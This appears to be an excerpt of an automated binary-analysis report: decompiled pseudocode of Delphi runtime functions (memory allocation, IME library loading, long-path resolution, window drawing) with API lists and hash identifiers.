                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
                                                                        • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                        				signed int _v20;
                                                                        				void** _v24;
                                                                        				void* _t15;
                                                                        				void** _t16;
                                                                        				void* _t17;
                                                                        				signed int _t27;
                                                                        				intOrPtr* _t29;
                                                                        				void* _t31;
                                                                        				intOrPtr* _t32;
                                                                        
                                                                        				_v24 = __ecx;
                                                                        				 *_t32 = __edx;
                                                                        				_t31 = __eax & 0xfffff000;
                                                                        				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                        				 *_v24 = _t31;
                                                                        				_t15 = _v20 - _t31;
                                                                        				_v24[1] = _t15;
                                                                        				_t29 =  *0x4965e4; // 0x69c334
                                                                        				while(_t29 != 0x4965e4) {
                                                                        					_t17 =  *(_t29 + 8);
                                                                        					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                        					if(_t31 > _t17) {
                                                                        						_t17 = _t31;
                                                                        					}
                                                                        					if(_t27 > _v20) {
                                                                        						_t27 = _v20;
                                                                        					}
                                                                        					if(_t27 > _t17) {
                                                                        						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                        						if(_t15 == 0) {
                                                                        							_t16 = _v24;
                                                                        							 *_t16 = 0;
                                                                        							return _t16;
                                                                        						}
                                                                        					}
                                                                        					_t29 =  *_t29;
                                                                        				}
                                                                        				return _t15;
                                                                        			}













                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction ID: df40b9f29fcf593a2001ebb942b006e8579671ba7d571f2f05a33fea13171e4b
                                                                        • Opcode Fuzzy Hash: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction Fuzzy Hash: F1118E76A04705AFC3109F29C880A2BBBE1EFD4760F16C53EE598A73A5D735AC408789
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041D260(intOrPtr _a4, intOrPtr _a8) {
                                                                        				void* _t14;
                                                                        				void _t15;
                                                                        				intOrPtr _t25;
                                                                        				char* _t26;
                                                                        				void* _t35;
                                                                        
                                                                        				if( *0x496a20 == 0) {
                                                                        					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                        					_t35 = _t14;
                                                                        					_t15 =  *0x496a1c; // 0x2260000
                                                                        					 *_t35 = _t15;
                                                                        					_t1 = _t35 + 4; // 0x4
                                                                        					E004029BC(0x47a4bc, 2, _t1);
                                                                        					_t2 = _t35 + 5; // 0x5
                                                                        					 *((intOrPtr*)(_t35 + 6)) = E0041D258(_t2, E0041D238);
                                                                        					_t4 = _t35 + 0xa; // 0xa
                                                                        					_t26 = _t4;
                                                                        					do {
                                                                        						 *_t26 = 0xe8;
                                                                        						_t5 = _t35 + 4; // 0x4
                                                                        						 *((intOrPtr*)(_t26 + 1)) = E0041D258(_t26, _t5);
                                                                        						 *((intOrPtr*)(_t26 + 5)) =  *0x496a20;
                                                                        						 *0x496a20 = _t26;
                                                                        						_t26 = _t26 + 0xd;
                                                                        					} while (_t26 - _t35 < 0xffc);
                                                                        					 *0x496a1c = _t35;
                                                                        				}
                                                                        				_t25 =  *0x496a20;
                                                                        				 *0x496a20 =  *((intOrPtr*)(_t25 + 5));
                                                                        				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                        				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                        				return  *0x496a20;
                                                                        			}









                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction ID: ab322e860265238dc008cf03a3abd9f104667954c24ec927d3ccddf525789675
                                                                        • Opcode Fuzzy Hash: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction Fuzzy Hash: 3A119E746003058FC710DF19C880B82FBE0EF88350F10C57BE9699B385D3B8E9018BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 83%
                                                                        			E004414DC() {
                                                                        				int _v8;
                                                                        				intOrPtr _t4;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				struct HINSTANCE__* _t17;
                                                                        				struct HINSTANCE__* _t19;
                                                                        				struct HINSTANCE__* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				struct HINSTANCE__* _t25;
                                                                        				struct HINSTANCE__* _t27;
                                                                        				struct HINSTANCE__* _t29;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t44;
                                                                        
                                                                        				_t42 = _t44;
                                                                        				_t4 =  *0x495c50; // 0x4967f0
                                                                        				if( *((char*)(_t4 + 0xc)) == 0) {
                                                                        					return _t4;
                                                                        				} else {
                                                                        					_v8 = SetErrorMode(0x8000);
                                                                        					_push(_t42);
                                                                        					_push(0x441642);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t44;
                                                                        					if( *0x496bc0 == 0) {
                                                                        						 *0x496bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                        					}
                                                                        					if( *0x47a9d8 == 0) {
                                                                        						 *0x47a9d8 = LoadLibraryA("IMM32.DLL");
                                                                        						if( *0x47a9d8 != 0) {
                                                                        							_t11 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bc4 = GetProcAddress(_t11, "ImmGetContext");
                                                                        							_t13 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bc8 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                        							_t15 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                        							_t17 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                        							_t19 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                        							_t21 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                        							_t23 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                        							_t25 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                        							_t27 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be4 = GetProcAddress(_t27, "ImmIsIME");
                                                                        							_t29 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be8 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                        						}
                                                                        					}
                                                                        					_pop(_t40);
                                                                        					 *[fs:eax] = _t40;
                                                                        					_push(0x441649);
                                                                        					return SetErrorMode(_v8);
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                        • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                        • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                        • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                        • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                        • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                        • SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                        • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                        • API String ID: 3397921170-3271328588
                                                                        • Opcode ID: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction ID: 689e1dabb6478f76fac1ff0258cb51012081a979876a385ea78672b4cdf9856c
                                                                        • Opcode Fuzzy Hash: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction Fuzzy Hash: B8318FF0641350AFE700EFA5EC56A297BA8E354305B13483BF109DB6B1E67D98E08B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00405AE8(char* __eax, intOrPtr __edx) {
                                                                        				char* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				struct _WIN32_FIND_DATAA _v334;
                                                                        				char _v595;
                                                                        				void* _t45;
                                                                        				char* _t54;
                                                                        				char* _t64;
                                                                        				void* _t83;
                                                                        				intOrPtr* _t84;
                                                                        				char* _t90;
                                                                        				struct HINSTANCE__* _t91;
                                                                        				char* _t93;
                                                                        				void* _t94;
                                                                        				char* _t95;
                                                                        				void* _t96;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v16 = _v8;
                                                                        				_t91 = GetModuleHandleA("kernel32.dll");
                                                                        				if(_t91 == 0) {
                                                                        					L4:
                                                                        					if( *_v8 != 0x5c) {
                                                                        						_t93 = _v8 + 2;
                                                                        						goto L10;
                                                                        					} else {
                                                                        						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                        							_t95 = E00405AD4(_v8 + 2);
                                                                        							if( *_t95 != 0) {
                                                                        								_t14 = _t95 + 1; // 0x1
                                                                        								_t93 = E00405AD4(_t14);
                                                                        								if( *_t93 != 0) {
                                                                        									L10:
                                                                        									_t83 = _t93 - _v8;
                                                                        									_push(_t83 + 1);
                                                                        									_push(_v8);
                                                                        									_push( &_v595);
                                                                        									L00401338();
                                                                        									while( *_t93 != 0) {
                                                                        										_t90 = E00405AD4(_t93 + 1);
                                                                        										_t45 = _t90 - _t93;
                                                                        										if(_t45 + _t83 + 1 <= 0x105) {
                                                                        											_push(_t45 + 1);
                                                                        											_push(_t93);
                                                                        											_push( &(( &_v595)[_t83]));
                                                                        											L00401338();
                                                                        											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                        											if(_t94 != 0xffffffff) {
                                                                        												FindClose(_t94);
                                                                        												_t54 =  &(_v334.cFileName);
                                                                        												_push(_t54);
                                                                        												L00401340();
                                                                        												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                        													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                        													_push(0x105 - _t83 - 1);
                                                                        													_push( &(_v334.cFileName));
                                                                        													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                        													L00401338();
                                                                        													_t64 =  &(_v334.cFileName);
                                                                        													_push(_t64);
                                                                        													L00401340();
                                                                        													_t83 = _t83 + _t64 + 1;
                                                                        													_t93 = _t90;
                                                                        													continue;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										goto L17;
                                                                        									}
                                                                        									_push(_v12);
                                                                        									_push( &_v595);
                                                                        									_push(_v8);
                                                                        									L00401338();
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                        					if(_t84 == 0) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_push(0x105);
                                                                        						_push( &_v595);
                                                                        						_push(_v8);
                                                                        						if( *_t84() == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_push(_v12);
                                                                        							_push( &_v595);
                                                                        							_push(_v8);
                                                                        							L00401338();
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L17:
                                                                        				return _v16;
                                                                        			}




















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
                                                                        • lstrcpyn.KERNEL32(?,?,?,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
                                                                        • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5), ref: 00405BF2
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000), ref: 00405BFF
                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48), ref: 00405C0B
                                                                        • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
                                                                        • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
                                                                        • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
                                                                        • Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004759E0(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				char _v14;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				void* _v29;
                                                                        				char _v30;
                                                                        				signed char _v36;
                                                                        				intOrPtr* _v40;
                                                                        				void* _v56;
                                                                        				intOrPtr _v92;
                                                                        				char _v96;
                                                                        				struct tagLOGFONTA _v156;
                                                                        				char _v160;
                                                                        				char _v168;
                                                                        				intOrPtr _t463;
                                                                        				signed int _t464;
                                                                        				intOrPtr _t465;
                                                                        				signed int _t474;
                                                                        				signed int _t478;
                                                                        				intOrPtr _t528;
                                                                        				intOrPtr _t529;
                                                                        				intOrPtr _t535;
                                                                        				intOrPtr _t542;
                                                                        				intOrPtr _t543;
                                                                        				signed int _t557;
                                                                        				intOrPtr _t567;
                                                                        				intOrPtr _t578;
                                                                        				intOrPtr _t591;
                                                                        				signed int _t596;
                                                                        				signed int _t598;
                                                                        				signed int _t600;
                                                                        				signed int _t603;
                                                                        				signed int _t605;
                                                                        				signed int _t607;
                                                                        				intOrPtr _t609;
                                                                        				intOrPtr _t610;
                                                                        				signed int _t612;
                                                                        				signed int _t631;
                                                                        				signed int _t633;
                                                                        				signed int _t636;
                                                                        				signed int _t638;
                                                                        				signed int _t643;
                                                                        				signed int _t646;
                                                                        				signed int _t655;
                                                                        				signed int _t657;
                                                                        				signed int _t666;
                                                                        				signed int _t671;
                                                                        				intOrPtr _t685;
                                                                        				signed int _t687;
                                                                        				intOrPtr _t688;
                                                                        				intOrPtr _t689;
                                                                        				signed int _t702;
                                                                        				intOrPtr _t703;
                                                                        				signed int _t715;
                                                                        				signed int _t720;
                                                                        				signed int _t724;
                                                                        				intOrPtr _t732;
                                                                        				void* _t741;
                                                                        				void* _t744;
                                                                        				void* _t747;
                                                                        				void* _t753;
                                                                        				void* _t759;
                                                                        				void* _t761;
                                                                        				intOrPtr _t762;
                                                                        				intOrPtr* _t766;
                                                                        				void* _t769;
                                                                        				signed int _t778;
                                                                        				signed int _t781;
                                                                        				signed int _t795;
                                                                        				signed int _t796;
                                                                        				signed int _t797;
                                                                        				void* _t808;
                                                                        				intOrPtr _t818;
                                                                        				void* _t824;
                                                                        				intOrPtr _t833;
                                                                        				signed int _t854;
                                                                        				intOrPtr _t855;
                                                                        				struct HWND__* _t858;
                                                                        				intOrPtr _t864;
                                                                        				signed char* _t866;
                                                                        				intOrPtr _t880;
                                                                        				intOrPtr _t916;
                                                                        				intOrPtr _t921;
                                                                        				intOrPtr _t938;
                                                                        				intOrPtr _t942;
                                                                        				intOrPtr _t951;
                                                                        				intOrPtr _t965;
                                                                        				void* _t999;
                                                                        				void* _t1002;
                                                                        				intOrPtr _t1022;
                                                                        				signed int _t1025;
                                                                        				void* _t1026;
                                                                        				intOrPtr _t1029;
                                                                        				intOrPtr _t1031;
                                                                        				signed char* _t1042;
                                                                        				intOrPtr _t1043;
                                                                        				signed int _t1045;
                                                                        				signed int _t1046;
                                                                        				void* _t1049;
                                                                        				void* _t1050;
                                                                        				intOrPtr _t1051;
                                                                        				void* _t1052;
                                                                        				void* _t1053;
                                                                        
                                                                        				_t1020 = __edi;
                                                                        				_t1049 = _t1050;
                                                                        				_t1051 = _t1050 + 0xffffff5c;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_v160 = 0;
                                                                        				_v20 = 0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t1049);
                                                                        				_push(0x47669d);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t1051;
                                                                        				_t1029 =  *((intOrPtr*)(_v12 + 8));
                                                                        				_t463 =  *((intOrPtr*)(_t1029 + 8));
                                                                        				_t1052 = _t463 - 0xffffff97;
                                                                        				if(_t1052 > 0) {
                                                                        					__eflags = _t463 - 0xffffff9c;
                                                                        					if(__eflags > 0) {
                                                                        						_t464 = _t463 - 0xfffffff4;
                                                                        						__eflags = _t464;
                                                                        						if(_t464 == 0) {
                                                                        							_t465 = _v8;
                                                                        							_t466 =  *(_t465 + 0x210);
                                                                        							__eflags =  *(_t465 + 0x210);
                                                                        							if( *(_t465 + 0x210) == 0) {
                                                                        								goto L150;
                                                                        							} else {
                                                                        								_t833 = _t1029;
                                                                        								_push(_t1049);
                                                                        								_push(0x4761bb);
                                                                        								_push( *[fs:edx]);
                                                                        								 *[fs:edx] = _t1051;
                                                                        								E00420398(_t466);
                                                                        								 *(_v12 + 0xc) = 0;
                                                                        								_t474 =  *(_t833 + 0xc);
                                                                        								__eflags = _t474 & 0x00010000;
                                                                        								if((_t474 & 0x00010000) != 0) {
                                                                        									__eflags = _t474 & 0x00020000;
                                                                        									_v30 = (_t474 & 0x00020000) != 0;
                                                                        									__eflags = _v30;
                                                                        									if(_v30 == 0) {
                                                                        										L57:
                                                                        										E00402EF0( &_v96, 0x28);
                                                                        										_v92 =  *((intOrPtr*)(_t833 + 0x24));
                                                                        										__eflags =  *(_t833 + 0xc) & 0x00010002;
                                                                        										if(( *(_t833 + 0xc) & 0x00010002) != 0) {
                                                                        											_t578 = _v8;
                                                                        											_t951 = _v8;
                                                                        											__eflags =  *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c));
                                                                        											if( *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c)) != 0) {
                                                                        												SelectObject( *(_t833 + 0x10),  *(_v8 + 0x29c));
                                                                        												DeleteObject( *(_v8 + 0x298));
                                                                        												 *(_v8 + 0x298) = 0;
                                                                        												__eflags = 0;
                                                                        												 *(_v8 + 0x29c) = 0;
                                                                        											}
                                                                        										}
                                                                        										_t478 =  *(_t833 + 0xc);
                                                                        										__eflags = _t478 & 0x00010001;
                                                                        										if((_t478 & 0x00010001) == 0) {
                                                                        											__eflags = _t478 & 0x00010002;
                                                                        											if((_t478 & 0x00010002) == 0) {
                                                                        												__eflags = _t478 & 0x00010003;
                                                                        												if((_t478 & 0x00010003) == 0) {
                                                                        													__eflags = _t478 & 0x00010004;
                                                                        													if((_t478 & 0x00010004) != 0) {
                                                                        														__eflags = _v30;
                                                                        														if(_v30 == 0) {
                                                                        															E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        															 *((intOrPtr*)( *_v8 + 0x100))(3);
                                                                        														} else {
                                                                        															E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        															 *((intOrPtr*)( *_v8 + 0x104))(3,  *((intOrPtr*)(_t833 + 0x28)));
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _v30;
                                                                        													if(_v30 == 0) {
                                                                        														E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        														 *((intOrPtr*)( *_v8 + 0x100))(2);
                                                                        													} else {
                                                                        														E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        														 *((intOrPtr*)( *_v8 + 0x104))(2,  *((intOrPtr*)(_t833 + 0x28)));
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _v30;
                                                                        												if(_v30 == 0) {
                                                                        													E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        													 *((intOrPtr*)( *_v8 + 0x100))(1);
                                                                        												} else {
                                                                        													E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        													 *((intOrPtr*)( *_v8 + 0x104))(1,  *((intOrPtr*)(_t833 + 0x28)));
                                                                        												}
                                                                        											}
                                                                        											goto L82;
                                                                        										} else {
                                                                        											_push(_t1049);
                                                                        											_push(0x475ff5);
                                                                        											_push( *[fs:edx]);
                                                                        											 *[fs:edx] = _t1051;
                                                                        											E004207B0( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
                                                                        											E0042062C( *((intOrPtr*)(_v8 + 0x210)));
                                                                        											E00420648( *((intOrPtr*)(_v8 + 0x210)));
                                                                        											_t528 =  *((intOrPtr*)(_v8 + 0x210));
                                                                        											_t938 =  *((intOrPtr*)(_t528 + 0xc));
                                                                        											 *((intOrPtr*)(_t938 + 0xc)) = _v8;
                                                                        											 *((intOrPtr*)(_t938 + 8)) = 0x477760;
                                                                        											_t529 =  *((intOrPtr*)(_t528 + 0x14));
                                                                        											 *((intOrPtr*)(_t529 + 0xc)) = _v8;
                                                                        											 *((intOrPtr*)(_t529 + 8)) = 0x477760;
                                                                        											 *((char*)(_v8 + 0x28a)) = 0;
                                                                        											__eflags = _v30;
                                                                        											if(_v30 == 0) {
                                                                        												E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        												_t880 =  *((intOrPtr*)(_t833 + 0x28));
                                                                        												_v13 =  *((intOrPtr*)( *_v8 + 0x100))(0);
                                                                        											} else {
                                                                        												E0047582C(_t833,  &_v96, _t1020, _t1029);
                                                                        												_t153 =  &_v12; // 0x477760
                                                                        												_t155 =  *((intOrPtr*)( *_t153 + 8)) + 0x38; // 0x367501fa
                                                                        												_t880 =  *_t155;
                                                                        												_v13 =  *((intOrPtr*)( *_v8 + 0x104))(0,  *((intOrPtr*)(_t833 + 0x28)));
                                                                        											}
                                                                        											__eflags = _v13;
                                                                        											if(_v13 != 0) {
                                                                        												_t535 = _v8;
                                                                        												__eflags =  *((char*)(_t535 + 0x28a));
                                                                        												if( *((char*)(_t535 + 0x28a)) != 0) {
                                                                        													 *((char*)(_v8 + 0x28a)) = 0;
                                                                        													_t1031 =  *((intOrPtr*)(_v8 + 0x210));
                                                                        													_t542 =  *((intOrPtr*)(_t1031 + 0xc));
                                                                        													 *((intOrPtr*)(_t542 + 8)) = 0;
                                                                        													 *((intOrPtr*)(_t542 + 0xc)) = 0;
                                                                        													_t543 =  *((intOrPtr*)(_t1031 + 0x14));
                                                                        													 *((intOrPtr*)(_t543 + 8)) = 0;
                                                                        													 *((intOrPtr*)(_t543 + 0xc)) = 0;
                                                                        													_t181 =  &_v12; // 0x477760
                                                                        													_t1022 =  *((intOrPtr*)( *_t181 + 8));
                                                                        													 *((intOrPtr*)(_t1022 + 0x30)) = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_t1031 + 0xc)) + 0x18)));
                                                                        													 *((intOrPtr*)(_t1022 + 0x34)) = E0041EFA4(E0041FC48( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0x14))));
